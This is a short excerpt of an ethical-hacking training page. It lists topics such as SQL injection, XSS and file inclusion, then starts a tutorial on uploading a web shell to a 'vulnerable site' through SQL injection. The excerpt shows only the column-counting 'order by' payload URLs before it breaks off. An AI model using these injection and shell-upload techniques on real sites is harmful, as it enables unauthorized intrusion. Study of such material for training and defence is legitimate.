Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Table of Contents
Introduction
MySQL injection▸ How does MySQL injection work?
▸ How do our malicious queries get executed?
Cross Site Scripting▸ How does Cross Site Scripting work?
▸ How do our malicious vectors get executed?
File inclusion▸ How does Local & Remote File Inclusion work?
▸ How do we […]
Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credits: Mike
Hello Everyone,
Today, we will see how to upload a shell through SQL injection (+No needed an Admin Panel),
Requirements:
Vulnerable site.
Shell in txt format [Example: http://.com/shell.txt].
Your Brain (;
~~~
Firstly, we need to use order by statement to count the number of columns.
http://.com/index.php?id=1+order+by+1–
http://.com/index.php?id=1+order+by+2–
http://.com/index.php?id=1+order+by+3–
http://.com/index.php?id=1+order+by+4–
We […]